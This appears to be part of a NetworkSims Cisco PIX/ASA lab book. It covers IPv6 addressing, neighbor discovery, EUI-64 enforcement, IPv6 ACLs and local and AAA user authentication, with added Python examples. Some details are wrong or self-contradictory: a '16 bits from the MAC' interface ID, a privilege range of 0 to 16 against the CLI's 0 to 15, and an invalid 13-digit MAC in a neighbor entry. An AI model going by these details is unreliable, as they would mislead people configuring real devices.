Version number (4 bits) contains the version number, such as 6 for IP Ver6. It is
used to differentiate between IPv4 and IPv6.
Priority (4 bits) indicates the priority of the datagram, and gives 16 levels of
priority (0 to 15). The first eight values (0 to 7) are used where the source is
providing congestion control (which is traffic that backs off when congestion
occurs). Examples are: 0 defines no priority, 1 defines background traffic (such as
netnews), 2 defines unattended transfer (such as e-mail) and 3 is reserved. The other
values are used for traffic that will not back off in response to congestion (such as
real-time traffic). The lowest priority for this is 8 (traffic which is the most willing to
be discarded) and the highest is 15 (traffic which is the least willing to be discarded).
Flow label (24 bits) is still experimental, but will be used to identify different data
flow characteristics. It is assigned by the source and can be used to label data packets
which require special handling by IPv6 routers, such as defined QoS (Quality of
Service) or real-time services.
Payload length (16 bits) defines the total size of the IP datagram (and includes the
data attached to the IP header).
Next header indicates which header follows the IP header (it uses the
same values as IPv4). For example: 0 defines IP information; 1 defines ICMP information; 6
defines TCP information and 80 defines ISO-IP.
Hop limit defines the maximum number of hops that the datagram takes as it
traverses the network. Each router decrements the hop limit by 1; when it reaches 0
the datagram is deleted. This has been renamed from IPv4, where it was called time-to-live, as it
better describes the parameter.
IP addresses (128 bits) define the source and destination IP addresses. There will be three main groups of IP
addresses: unicast, multicast and anycast. A unicast address identifies a particular
host, a multicast address enables the hosts within a particular group to receive the
same packet, and an anycast address is addressed to a number of interfaces on
a single multicast address.
Figure 1  IP Ver6 header format (fields in order: Version, Priority, Flow label; Payload length, Next header, Hop limit; Source IP address; Destination IP address)

IPv6 addresses do not use the dotted notation and are written in a hexadecimal format, such
as:

114F:0000:0000:0000:0006:0600:4411:CB1D

Often the leading zeros are omitted to give:

114F:0:0:0:6:600:4411:CB1D

This address can be shortened further by converting the run of all-zero groups to a double colon, to give:

114F::6:600:4411:CB1D

These addresses can have certain scopes:

Link-local. These have a scope on the local link (which are the nodes on the same
subnet).
Site-local. These have a scope within the organization (private site addressing).
Global. These have global scope and are IPv6 Internet addresses.

Of the 128 bit global unicast addresses, the format can be viewed as:

Public Topology (48 bits).
Site Topology (16 bits).
Interface ID (64 bits).

Objectives
The objectives of this challenge are to:

Define IPv6 on E0 using the autoconfig option for the address (ipv6 address
autoconfig) which enables stateless autoconfiguration, where the interface itself
configures its own address based on the prefixes it receives from Router
Advertisements (using the Modified EUI-64 Interface ID).
Define IPv6 neighbor discovery to learn about neighboring devices.
Define a static IPv6 mapping (if the automated discovery does not work).
Define the default route.
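The stateless autoconfiguration named in the objectives (a /64 prefix from a Router Advertisement joined to a Modified EUI-64 Interface ID built from the MAC address) and the zero-compressed address notation described above, as an added Python example that is not part of the NetworkSims material; the MAC address is a constructed sample value and the prefix is the page's 2001:400:3:1::/64.

```python
import re


def parse_mac(mac: str) -> bytes:
    """Accept 00:11:22:33:44:55, 00-11-22-33-44-55 or Cisco-style 0011.2233.4455."""
    digits = re.sub(r"[^0-9A-Fa-f]", "", mac)
    if len(digits) != 12:
        raise ValueError("MAC must contain exactly 12 hex digits: %r" % mac)
    return bytes.fromhex(digits)


def modified_eui64(mac: str) -> bytes:
    """64-bit Interface ID: OUI | FF FE | NIC part, with the universal/local
    bit (0x02 of the first octet) inverted (RFC 4291, Appendix A)."""
    m = parse_mac(mac)
    iid = bytearray(m[:3] + b"\xff\xfe" + m[3:])
    iid[0] ^= 0x02
    return bytes(iid)


def expand(addr: str) -> list:
    """Text form -> eight 16-bit groups; handles one '::' and dropped leading zeros."""
    if addr.count("::") > 1:
        raise ValueError("at most one '::' is allowed: %r" % addr)
    if "::" in addr:
        head, tail = addr.split("::")
        left = [int(g, 16) for g in head.split(":") if g]
        right = [int(g, 16) for g in tail.split(":") if g]
        missing = 8 - len(left) - len(right)
        if missing < 1:
            raise ValueError("'::' must stand for at least one zero group: %r" % addr)
        groups = left + [0] * missing + right
    else:
        groups = [int(g, 16) for g in addr.split(":")]
    if len(groups) != 8 or not all(0 <= g <= 0xFFFF for g in groups):
        raise ValueError("invalid IPv6 address: %r" % addr)
    return groups


def compress(groups) -> str:
    """RFC 5952 text form: leading zeros dropped, the longest run of two or more
    zero groups replaced by '::' (the first run on a tie), lowercase hex."""
    best_start, best_len, i = -1, 0, 0
    while i < 8:
        if groups[i] != 0:
            i += 1
            continue
        j = i
        while j < 8 and groups[j] == 0:
            j += 1
        if j - i > best_len:
            best_start, best_len = i, j - i
        i = j
    hexes = ["%x" % g for g in groups]
    if best_len < 2:
        return ":".join(hexes)
    return ":".join(hexes[:best_start]) + "::" + ":".join(hexes[best_start + best_len:])


def stateless_address(prefix: str, mac: str) -> str:
    """Combine a /64 prefix (as advertised in a Router Advertisement) with the
    Modified EUI-64 Interface ID derived from the MAC address."""
    net, _, plen = prefix.partition("/")
    if plen != "64":
        raise ValueError("stateless autoconfiguration needs a /64 prefix: %r" % prefix)
    groups = expand(net)[:4]
    iid = modified_eui64(mac)
    groups += [int.from_bytes(iid[k:k + 2], "big") for k in (0, 2, 4, 6)]
    return compress(groups)


def link_local(mac: str) -> str:
    """The link-local address an IPv6 interface derives from its Interface ID."""
    return stateless_address("fe80::/64", mac)


if __name__ == "__main__":
    # Constructed sample MAC; the prefix is the one used in the page's commands.
    mac = "0011.2233.4455"
    print(link_local(mac))
    print(stateless_address("2001:400:3:1::/64", mac))
    print(compress(expand("114F:0000:0000:0000:0006:0600:4411:CB1D")))
```

Note that a MAC-derived Interface ID is stable and globally unique, which is why privacy extensions (RFC 4941) exist; this block implements only the Modified EUI-64 form the objectives name.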

Commands
(config)# int e0
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# int e1
(config-if)# ipv6 address 2001:400:3:1::1/64
(config-if)# ipv6 enable
(config-if)# ipv6 nd ns-interval 1000
(config-if)# ipv6 nd ra-interval 1000
(config-if)# ipv6 nd reachable-time 100
(config-if)# ipv6 nd prefix 0800::/64
(config-if)# exit
(config)# ipv6 route outside ::/0 2001:400:3:1::1
(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
# sh ipv interface
# sh ipv6 route

Step-by-step
(config)# int e0


! The next command defines that the interface builds its own IPv6 address
! based on Router Advertisements:
(config-if)# ipv6 address autoconfig

! The next command enables IPv6 on the interface:
(config-if)# ipv6 enable
(config-if)# exit
(config)# int e1

! The next command assigns a global address on the interface, which automatically creates a
! link-local address (using the Interface ID):
(config-if)# ipv6 address 2001:400:3:1::1/64

! The next command enables IPv6 on the interface:
(config-if)# ipv6 enable

! IPv6 contains a duplicate address detection system. The interval between neighbor
! solicitation messages is defined with the following (in this case 1000 milliseconds):
(config-if)# ipv6 nd ns-interval 1000

! The interval between IPv6 router advertisement retransmissions on an interface can be defined
! with:
(config-if)# ipv6 nd ra-interval 1000
! The time that a remote IPv6 node is considered reachable after a reachability confirmation event
! has occurred, is defined with:
(config-if)# ipv6 nd reachable-time 100

! The IPv6 prefix which is included in IPv6 router advertisements is defined with:
(config-if)# ipv6 nd prefix 0800::/64
(config-if)# exit
! To define a default route:
(config)# ipv6 route outside ::/0 2001:400:3:1::1
! To define a static entry, if discovery does not work:
(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
(config)# exit
# sh ipv interface
# sh ipv6 route

Example


(config)# int e0
(config-if)# ipv6 ?
interface mode commands/options:
IPv6 interface subcommands:
address  Configure IPv6 address on interface
enable   Enable IPv6 on interface
nd       IPv6 interface Neighbor Discovery subcommands
configure mode commands/options:
access-list  Configure access policy for IPv6 traffic through the system
icmp         Configure access rules for ICMPv6 traffic terminating at an
             interface
neighbor     Neighbor
route        Configure IPv6 routes
(config-if)# ipv6 address ?
interface mode commands/options:
Hostname or X:X:X:X::X  IPv6 link-local address
X:X:X:X::X/<0-128>      IPv6 prefix
autoconfig              Obtain address using autoconfiguration
configure mode commands/options:
WORD  Access list identifier
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# int e1
(config-if)# ipv6 address 2001:400:3:1::1/64
(config-if)# ipv6 enable
(config-if)# ipv6 nd ?
interface mode commands/options:
dad             Duplicate Address Detection
ns-interval     Set advertised NS retransmission interval
prefix          Configure IPv6 Routing Prefix Advertisement
ra-interval     Set IPv6 Router Advertisement Interval
ra-lifetime     Set IPv6 Router Advertisement Lifetime
reachable-time  Set advertised reachability time
suppress-ra     Suppress IPv6 Router Advertisements
pixfirewall(config-if)# ipv6 nd ns-interval ?
interface mode commands/options:
<1000-3600000> Retransmission interval in milliseconds
pixfirewall(config-if)# ipv6 nd ns-interval 1000
pixfirewall(config-if)# ipv6 nd p ?
interface mode commands/options:
X:X:X:X::X/<0-128> IPv6 prefix x:x::y/<z>
default
Specify prefix default parameters
pixfirewall(config-if)# ipv6 nd prefix 0800::/64
pixfirewall(config-if)# ipv6 nd ra-interval ?
interface mode commands/options:
<3-1800> RA Interval (sec)
msec
Interval in milliseconds

NetworkSims.com

675

pixfirewall(config-if)# ipv6 nd ra-interval 100
pixfirewall(config-if)# ipv6 nd reachable-time ?
interface mode commands/options:
<0-3600000> Reachability time in milliseconds
(config-if)# ipv6 nd reachable-time 100
(config-if)# exit
(config)# ipv6 ?
configure mode commands/options:
access-list   Configure access policy for IPv6 traffic through the system
enforce-eui64 Enforce correct EUI-64 source address
icmp          Configure access rules for ICMPv6 traffic terminating at an
              interface
neighbor      Neighbor
route         Configure IPv6 routes
(config)# ipv6 route ?
configure mode commands/options:
Current available interface(s):
Inf2    Name of interface Ethernet2
Inside  Name of interface Ethernet1
Outside Name of interface Ethernet0
(config)# ipv r outside ?
configure mode commands/options:
X:X:X:X::X/<0-128> IPv6 prefix
(config)# ipv r outside ::/0 ?
configure mode commands/options:
Hostname or X:X:X:X::X IPv6 name or address
(config)# ipv6 route outside ::/0 2001:400:3:1::1
(config)# ipv6 ?
configure mode commands/options:
access-list Configure access policy for IPv6 traffic through the system
icmp        Configure access rules for ICMPv6 traffic terminating at an
            interface
neighbor    Neighbor
route       Configure IPv6 routes
(config)# ipv6 neighbor ?
configure mode commands/options:
X:X:X:X::X IPv6 address
(config)# ipv6 neighbor fe80:0000 ?
configure mode commands/options:
Current available interface(s):
Inf2    Name of interface Ethernet2
Outside Name of interface Ethernet1
Inside  Name of interface Ethernet0
(config)# ipv6 neighbor fe80:0000 inside 0000.1111.22222
(config)# exit
# sh ipv6 ?
access-list Show hit counters for access policies
icmp        Show ICMPv6 access rules configured on all interfaces
interface   IPv6 interface status and configuration
neighbor    Show IPv6 neighbor cache entries
route       Show IPv6 routes
routers     Show local IPv6 routers
traffic     IPv6 traffic statistics

# sh ipv6 interface
outside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77d9 [TENTATIVE]
No global unicast address is configured
Joined group address(es):
ff02::1
ff02::2
ff02::1:ff85:77d9
ICMP error messages limited to one every 100 milliseconds
ICMP redirects are enabled
ND DAD is enabled, number of DAD attempts: 1
ND reachable time is 30000 milliseconds
ND advertised reachable time is 0 milliseconds
ND advertised retransmit interval is 1000 milliseconds
ND router advertisements are sent every 200 seconds
ND router advertisements live for 1800 seconds
Hosts use stateless autoconfig for addresses.
inside is administratively down, line protocol is down
IPv6 is enabled, link-local address is fe80::20d:65ff:fe85:77da [TENTATIVE]
Global unicast address(es):
2001:400:3:1::1, subnet is 2001:400:3:1::/64 [TENTATIVE]
Joined group address(es):
ff02::1
ff02::2
ff02::1:ff85:77da
ICMP error messages limited to one every 100 milliseconds
ICMP redirects are enabled
ND DAD is enabled, number of DAD attempts: 1
ND reachable time is 30000 milliseconds
ND advertised reachable time is 0 milliseconds
ND advertised retransmit interval is 1000 milliseconds
ND router advertisements are sent every 200 seconds
ND router advertisements live for 1800 seconds
Hosts use stateless autoconfig for addresses.
# sh ipv6 route
IPv6 Routing Table - 2 entries
Codes: C - Connected, L - Local, S - Static, R - RIP, B - BGP
U - Per-user Static route
I1 - ISIS L1, I2 - ISIS L2, IA - ISIS interarea
O - OSPF intra, OI - OSPF inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2
fe80::/10 [0/0]
via ::, outside
via ::, inside
via ::, inf2
ff00::/8 [0/0]
via ::, outside
via ::, inside
via ::, inf2

Cisco PIX/ASA Challenge 129


Title: Enforcing Modified EUI64 for Interface IDs for IPv6 interfaces
Outline
IPv6 addresses do not use the dotted notation of IPv4 and are written in hexadecimal, such
as:

114F:0000:0000:0000:0006:0600:4411:CB1D
Often the leading zeros are omitted to give:

114F:0:0:0:6:600:4411:CB1D
This address can be shortened further by replacing the run of all-zero fields with a double colon, to give:

114F::6:600:4411:CB1D
The unicast address contains 128 bits, and has the following fields:
Field Prefix (FP) field (3 bits). This identifies whether the address is unicast, multicast,
and so on. A value of 001 identifies aggregatable global unicasts.
Top-Level Aggregation Identifier (TLA ID field) (13 bits). This is used to identify the
authority responsible for the address at the highest level of the routing hierarchy.
Res field (8 bits). This is reserved so that the TLA or NLA IDs can be expanded for
future use.
NLA ID field (24 bits). This is used to identify ISPs, and can be organized to reflect a
hierarchy, or multitiered relationship, among providers.
SLA ID field (16 bits). This is used by individual organizations in order to define a
local addressing hierarchy and to identify subnets.
Interface ID field (64 bits). This uses an IEEE EUI-64 format and is a unique ID for
the network interface. In Ethernet-type networks, it uses the 16 bits from the MAC
address of the network port.
RFC 3513 defines the IPv6 addressing architecture, and specifies that all IPv6 addresses,
apart from those beginning with binary 000, carry a 64-bit interface ID in Modified EUI-64 format. In
this challenge the PIX/ASA is set up to check the source IPv6 address of each received packet against the
source MAC address, so that the sending interface is shown to have used the Modified EUI-64 format. If it
has not, the packet is dropped and an error message is shown.
Objectives
The objectives of this challenge are to:

Define IPv6 on E0.
Enforce Modified EUI-64 Interface IDs on E0.

Commands
(config)# int e0
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# ipv6 enforce-eui64 inside
(config)# ipv6 enforce-eui64 outside

Example
(config)# int e0
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# ipv6 ?
configure mode commands/options:
access-list   Configure access policy for IPv6 traffic through the system
enforce-eui64 Enforce correct EUI-64 source address
icmp          Configure access rules for ICMPv6 traffic terminating at an
              interface
neighbor      Neighbor
route         Configure IPv6 routes
(config)# ipv6 enforce-eui-64 ?
configure mode commands/options:
Current available interface(s):
Inf2 Name of interface Ethernet2
Inside Name of interface Ethernet1
Outside Name of interface Ethernet0
(config)# ipv6 enforce-eui64 inside
(config)# ipv6 enforce-eui64 outside
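The check behind ipv6 enforce-eui64, worked through in Python as an added example (not NetworkSims or Cisco code): it derives the Modified EUI-64 interface ID from a MAC address and reports source addresses whose interface ID was not derived from the frame's source MAC. The MAC addresses below are constructed to match the link-local addresses in the transcript above.

```python
"""Modified EUI-64 derivation and the source-address check that
`ipv6 enforce-eui64` applies. Added example, not NetworkSims or Cisco code;
the sample MACs/addresses are constructed."""
import ipaddress


def mac_to_modified_eui64(mac: str) -> bytes:
    """Return the 8-byte Modified EUI-64 interface identifier for a 48-bit MAC.

    RFC 4291 Appendix A: split the MAC into its 24-bit OUI and 24-bit NIC
    halves, insert 0xFFFE between them and invert the universal/local bit
    (0x02 of the first octet). Cisco (0000.1111.2222), colon and hyphen
    notations are all accepted.
    """
    digits = mac.replace(":", "").replace("-", "").replace(".", "")
    if len(digits) != 12:
        raise ValueError(f"expected a 48-bit MAC address, got {mac!r}")
    octets = bytes.fromhex(digits)
    eui64 = bytearray(octets[:3] + b"\xff\xfe" + octets[3:])
    eui64[0] ^= 0x02  # flip the U/L bit
    return bytes(eui64)


def interface_id(addr: str) -> bytes:
    """Low 64 bits (the Interface ID field) of an IPv6 address."""
    return ipaddress.IPv6Address(addr).packed[8:]


def is_eui64_derived(addr: str, mac: str) -> bool:
    """True when the Interface ID of addr is the Modified EUI-64 of mac."""
    return interface_id(addr) == mac_to_modified_eui64(mac)


def autoconfigured_address(prefix: str, mac: str) -> str:
    """Address a host forms by stateless autoconfig from a /64 prefix and its MAC."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    if net.prefixlen != 64:
        raise ValueError("Modified EUI-64 interface IDs need a /64 prefix")
    packed = net.network_address.packed[:8] + mac_to_modified_eui64(mac)
    return str(ipaddress.IPv6Address(packed))


def enforce_eui64(frames):
    """Apply the enforcement rule to (src_mac, src_ipv6) pairs.

    Returns the source addresses that would be dropped because their
    Interface ID was not derived from the frame's source MAC. Link-local
    and global addresses are checked the same way.
    """
    return [ip for mac, ip in frames if not is_eui64_derived(ip, mac)]


# Constructed sample traffic: two hosts with EUI-64 IDs, one with a manual ::1.
SAMPLE_FRAMES = [
    ("00:0d:65:85:77:d9", "fe80::20d:65ff:fe85:77d9"),
    ("00:0d:65:85:77:d9", "2001:400:3:1:20d:65ff:fe85:77d9"),
    ("00:0d:65:85:77:da", "2001:400:3:1::1"),
]

if __name__ == "__main__":
    for ip in enforce_eui64(SAMPLE_FRAMES):
        print(f"dropped: {ip} (interface ID is not the Modified EUI-64 of the source MAC)")
```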

Cisco PIX/ASA Challenge 130


Title: Define an IPv6 ACL


Outline
IPv6 ACLs operate in the same way as normal ACLs, but match on IPv6 addresses.
Objectives
The objectives of this challenge are to:

Define an IPv6 ACL.
Define IPv6 on E0.
Enforce Modified EUI-64 Interface IDs on E0.
Apply an IPv6 ACL onto E0 and E1.

Commands
(config)# ipv6 access-list testing deny ip 3EFE:3031:5::/48 any
(config)# ipv6 access-list testing deny ip 3EFE:3031:8::/48 any
(config)# ipv6 access-list testing permit ip any any
(config)# int e0
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# ipv6 enforce-eui64 inside
(config)# ipv6 enforce-eui64 outside
(config)# access-group testing interface inside
(config)# access-group testing interface outside

Example
(config)# ipv6 ?
configure mode commands/options:
access-list   Configure access policy for IPv6 traffic through the system
enforce-eui64 Enforce correct EUI-64 source address
icmp          Configure access rules for ICMPv6 traffic terminating at an
              interface
neighbor      Neighbor
route         Configure IPv6 routes
(config)# ipv6 access-list ?
configure mode commands/options:
WORD Access list identifier
(config)# ipv6 access-list testing ?
configure mode commands/options:
deny   Specify packets to reject
line   Use this to specify line number at which ACE should be entered
permit Specify packets to forward
remark Specify a comment (remark) for the access-list after this keyword
(config)# ipv6 a testing deny ?
configure mode commands/options:
<0-255> Enter protocol number (0 - 255)
ah
eigrp
esp
gre
icmp
icmp6
igmp
igrp
ip
ipinip
ipsec
nos
object-group Specify a protocol object-group after this keyword
ospf
pcp
pim
pptp
snp
tcp
udp
(config)# ipv6 access-list testing deny ip ?
configure mode commands/options:
X:X:X:X::X/<0-128> Source IPv6 address/prefix
any                Abbreviation for source prefix ::/0
host               Use this keyword to configure source host
interface          Use interface address as source address
object-group       Network object-group for source address
(config)# ipv6 access-list testing deny ip 3EFE:3031:3::/48
(config)# ipv6 access-list testing deny ip 3EFE:3031:3::/48 ?
configure mode commands/options:
Hostname or A.B.C.D Destination IP address
X:X:X:X::X/<0-128>  Destination IPv6 address/prefix
any                 Abbreviation for destination prefix ::/0
host                Use this keyword to configure destination host
interface           Use interface address as destination address
object-group        Network object-group for destination address
(config)# ipv6 access-list testing deny ip 3EFE:3031:5::/48 any
(config)# ipv6 access-list testing permit ip any any
(config)# int e0
(config-if)# ipv6 address autoconfig
(config-if)# ipv6 enable
(config-if)# exit
(config)# ipv6 enforce-eui64 inside
(config)# ipv6 enforce-eui64 outside
(config)# access-group testing interface inside
(config)# access-group testing interface outside
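First-match evaluation of the testing ACL configured above, written in Python as an added example (not NetworkSims or Cisco code). It parses the access-list lines as typed, accepts the any, host and prefix operands shown in the help output, and falls through to the implicit deny; the sample destination addresses are constructed.

```python
"""Parse and evaluate PIX/ASA-style IPv6 access-list lines. Added example,
not NetworkSims or Cisco code; sample packets are constructed."""
import ipaddress
from dataclasses import dataclass

ANY = ipaddress.IPv6Network("::/0")


@dataclass(frozen=True)
class Ace:
    action: str                  # "permit" or "deny"
    protocol: str                # "ip" matches every protocol
    src: ipaddress.IPv6Network
    dst: ipaddress.IPv6Network


def _take_prefix(tokens: list) -> ipaddress.IPv6Network:
    """Consume one address operand: any | host X:X::X | X:X::X/<len>."""
    if not tokens:
        raise ValueError("missing address operand")
    tok = tokens.pop(0)
    if tok == "any":
        return ANY
    if tok == "host":
        if not tokens:
            raise ValueError("host keyword needs an address")
        return ipaddress.IPv6Network(tokens.pop(0) + "/128")
    return ipaddress.IPv6Network(tok, strict=False)


def parse_acl(lines) -> dict:
    """Parse 'ipv6 access-list NAME {permit|deny} PROTO SRC DST' lines, keyed by ACL name."""
    acls: dict = {}
    for line in lines:
        tokens = line.split()
        if tokens[:2] != ["ipv6", "access-list"] or len(tokens) < 6:
            raise ValueError(f"unsupported line: {line!r}")
        name, action, proto = tokens[2:5]
        if action not in ("permit", "deny"):
            raise ValueError(f"bad action in {line!r}")
        rest = tokens[5:]
        src = _take_prefix(rest)
        dst = _take_prefix(rest)
        if rest:
            raise ValueError(f"trailing operands in {line!r}")
        acls.setdefault(name, []).append(Ace(action, proto, src, dst))
    return acls


def evaluate(aces, protocol: str, src: str, dst: str):
    """Return (action, 1-based line of the matching ACE).

    The first ACE whose protocol, source and destination all match decides;
    traffic matching no ACE hits the implicit deny at the end of the list.
    """
    s, d = ipaddress.IPv6Address(src), ipaddress.IPv6Address(dst)
    for line_no, ace in enumerate(aces, start=1):
        if ace.protocol in ("ip", protocol) and s in ace.src and d in ace.dst:
            return ace.action, line_no
    return "deny", None


# The ACL exactly as configured in this challenge.
ACL_LINES = [
    "ipv6 access-list testing deny ip 3EFE:3031:5::/48 any",
    "ipv6 access-list testing deny ip 3EFE:3031:8::/48 any",
    "ipv6 access-list testing permit ip any any",
]
TESTING = parse_acl(ACL_LINES)["testing"]

if __name__ == "__main__":
    # Constructed packets: one from each denied /48, one from elsewhere.
    for proto, src, dst in [("tcp", "3efe:3031:5::10", "2001:db8::1"),
                            ("tcp", "3efe:3031:8:ffff::10", "2001:db8::1"),
                            ("udp", "3efe:3031:9::10", "2001:db8::1")]:
        print(proto, src, "->", dst, evaluate(TESTING, proto, src, dst))
```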

Cisco PIX/ASA Test (Challenge 131)


Outline
This challenge involves taking a PIX test on IPv6. The main facts are:

An IPv6 address has 128 bits.
The Interface ID is based on 64 bits from the MAC address (which has 48 bits).
The format is two-digit hexadecimal separated by colons.
A double colon represents a run of zeros.

Cisco PIX/ASA Challenge 132


Title: Defining users and passwords
Outline
The PIX/ASA has a local database for users which defines user details for:

CLI access login. This involves the user authentication for login to the device.
Privilege mode authentication. This defines the privileged level for the access. With a
Cisco device the highest privileged level is 15.
Command authentication. This defines the commands that can be executed for given
levels of user authentication.
Network access authentication.
VPN authentication/authorization.

The local user database is also useful as a fallback: when the back-end user
authentication system, such as a RADIUS server, fails, the local database should still work.
Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 names.
Define username and password. The user name can be between 4 and 64 characters,
while the password may be between 3 and 16 characters.
Define username attributes. This supports the username mode (config-username),
and includes user specific information, such as for VPN settings.
Define a privileged level. By default the privilege level is 2. The lowest is 0, and the
highest is 16.

Commands
> enable
# config t
(config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# exit
amsterdam (config)# int e1
amsterdam (config-if)# nameif texas
amsterdam (config-if)# exit
amsterdam (config)# int e2
amsterdam (config-if)# nameif newyork
amsterdam (config-if)# exit
amsterdam (config)# username bert password test privilege 15
amsterdam (config)# username anne password test
amsterdam (config)# username anne attrib
amsterdam (config-username)# service-type nas-prompt

Example
> enable
# config t
(config)# hostname amsterdam
amsterdam (config)# domain-name shetland.gov
amsterdam (config)# int e0
amsterdam (config-if)# nameif california
amsterdam (config-if)# exit
amsterdam (config)# int e1
amsterdam (config-if)# nameif texas
amsterdam (config-if)# exit
amsterdam (config)# int e2
amsterdam (config-if)# nameif newyork
amsterdam (config-if)# exit
amsterdam (config)# username ?
configure mode commands/options:
WORD < 65 char Enter the name of the user. A minimum of 4 characters is
               required. A maximum of 64 characters is allowed.
amsterdam (config)# username anne ?
configure mode commands/options:
attributes Enter the attributes sub-command mode for the specified user
nopassword Indicates that this user has no password
password   The password for this user
amsterdam (config)# username anne password ?
configure mode commands/options:
WORD Enter the password for this user
amsterdam (config)# username anne password test
amsterdam (config)# username bert password test ?
configure mode commands/options:
encrypted    Indicates the <password> entered is encrypted
mschap       The password will be converted to unicode and hashed using MD4.
             User entries must be created this way if they are to be
             authenticated using MSCHAPv1 or MSCHAPv2
nt-encrypted Indicates the <password> entered has been converted to unicode
             and hashed using MD4, and can be used for MS-CHAP.
privilege    Enter the privilege level for this user
<cr>
amsterdam (config)# username bert password privilege ?
configure mode commands/options:
<0-15> The privilege level for this user
amsterdam (config)# username bert password test privilege 15
amsterdam (config)# username anne attrib
amsterdam (config-username)# ?
username configuration commands:
exit                    Exit from username attribute configuration mode
group-lock              Enter name of an existing tunnel-group that the user
                        is required to connect with
help                    Help for username configuration commands
no                      Remove an attribute value pair
password-storage        Enable/disable storage of the login password on the
                        client system
service-type            Define service-type
vpn-access-hours        Enter name of a configured time-range policy
vpn-filter              Enter name of user specific ACL
vpn-framed-ip-address   Enter the IP address and the net mask to be assigned
                        to the client
vpn-group-policy        Enter name of a group-policy to inherit attributes
                        from
vpn-idle-timeout        Enter idle timeout period in minutes, enter none to
                        disable
vpn-session-timeout     Enter maximum user connection time in minutes, enter
                        none for unlimited time
vpn-simultaneous-logins Enter maximum number of simultaneous logins allowed
vpn-tunnel-protocol     Enter permitted tunneling protocols
webvpn                  Configure user policy for WebVPN
amsterdam (config-username)# service-type ?
username mode commands/options:
admin         User is allowed access to the configuration prompt.
nas-prompt    User is allowed access to the exec prompt.
remote-access User is allowed network access.
amsterdam (config-username)# service-type nas-prompt

Cisco PIX/ASA Challenge 133


Title: Defining local authentication
Outline
The PIX/ASA has a local database for users, and can use AAA for local authentication. Checking
users against the local database for serial (console connection), telnet (Telnet connection),
ssh (SSH connection) and http (Web connection) login is enabled with:
(config)# aaa authentication serial console MYLOCAL
(config)# aaa authentication telnet console MYLOCAL
(config)# aaa authentication ssh console MYLOCAL
(config)# aaa authentication http console MYLOCAL

The console keyword is important as it defines that management sessions are authenticated,
whereas the MYLOCAL group, which uses the local protocol, defines that the local database is used.
Users can also be authenticated for the enable mode with:
(config)# aaa authentication enable console MYLOCAL

Here level 15 is the level required for the enable password command. The aaa-server
command is used to direct the outgoing AAA requests for the group to the local database:
(config)# aaa-server MYLOCAL protocol local

Objectives
The objectives of this challenge are to:

Define E0, E1 and E2 names.
Define username and password. The user name can be between 4 and 64 characters,
while the password may be between 3 and 16 characters.
Define authorization for Console, SSH, Telnet and HTTP login (aaa authentication
http console MYLOCAL).
Define local authentication (aaa-server MYLOCAL protocol local).

Commands
> enable
# config t
(config)# int e0
(config-if)# nameif california
(config-if)# exit
(config)# int e1
(config-if)# nameif texas
(config-if)# exit
(config)# int e2
(config-if)# nameif newyork
(config-if)# exit
(config)# username bert password test privilege 15
(config)# username anne password test
(config)# aaa-server MYLOCAL protocol local
(config-aaa-server-group)# exit
(config)# aaa authentication serial console MYLOCAL
(config)# aaa authentication telnet console MYLOCAL
(config)# aaa authentication ssh console MYLOCAL
(config)# aaa authentication http console MYLOCAL
(config)# aaa authentication enable console MYLOCAL

Example
> enable
# config t
(config)# int e0
(config-if)# nameif california
(config-if)# exit
(config)# int e1
(config-if)# nameif texas
(config-if)# exit
(config)# int e2
(config-if)# nameif newyork
(config-if)# exit
(config)# username bert password test privilege 15
(config)# username anne password test
pixfirewall(config)# aaa-s ?
configure mode commands/options:
WORD < 17 char Enter a AAA server group tag
pixfirewall(config)# aaa-s MYLOCAL ?
configure mode commands/options:
(                   Open parenthesis for the name of the network interface
                    where the designated AAA server is accessed
deadtime            Specify the amount of time that will elapse between the
                    disabling of the last server in the group and the
                    subsequent re-enabling of all servers
host                Enter this keyword to specify the IP address for the
                    server
max-failed-attempts Specify the maximum number of failures that will be
                    allowed for any server in the group before that server
                    is deactivated
protocol            Enter the protocol for a AAA server group
(config)# aaa-server MYLOCAL protocol ?
configure mode commands/options:
http-form Protocol HTTP form-based
kerberos  Protocol Kerberos
ldap      Protocol LDAP
local     Protocol Local
nt        Protocol NT
radius    Protocol RADIUS
sdi       Protocol SDI
tacacs+   Protocol TACACS+
(config)# aaa-server MYLOCAL protocol local
(config-aaa-server-group)# exit
(config)# aaa ?
configure mode commands/options:
accounting     Configure user accounting parameters
authentication Configure user authentication parameters
authorization  Configure user authorization parameters
local          AAA Local method options
mac-exempt     Configure MAC Exempt parameters
proxy-limit    Configure number of concurrent proxy connections allowed per
               user
(config)# aaa authentication ?
configure mode commands/options:
enable             Enable
exclude            Exclude the service, local and foreign network which
                   needs to be authenticated, authorized, and accounted
http               HTTP
include            Include the service, local and foreign network which
                   needs to be authenticated, authorized, and accounted
match              Specify this keyword to configure an ACL to match
secure-http-client Specify this keyword to ensure HTTP client authentication
                   is secured (over SSL)
serial             Serial
ssh                SSH
telnet             Telnet
(config)# aaa auth serial ?
configure mode commands/options:
console Specify this keyword to identify a server group for administrative
        authentication
(config)# aaa auth serial console ?
configure mode commands/options:
LOCAL Predefined server tag for AAA protocol 'local'
WORD  Name of RADIUS or TACACS+ aaa-server group for administrative
      Authentication
(config)# aaa authentication serial console MYLOCAL
(config)# aaa authentication telnet console MYLOCAL
(config)# aaa authentication ssh console MYLOCAL
(config)# aaa authentication http console MYLOCAL
(config)# aaa authentication enable console MYLOCAL

Cisco PIX/ASA Challenge 134


Title: RADIUS Authentication
Outline
The ASA/PIX device supports a wide range of AAA back ends, including RADIUS (Remote
Authentication Dial In User Service), Tacacs+, NT, LDAP, SDI and Kerberos. RADIUS is a
useful system for authentication, as it is well supported in many systems, and is common in
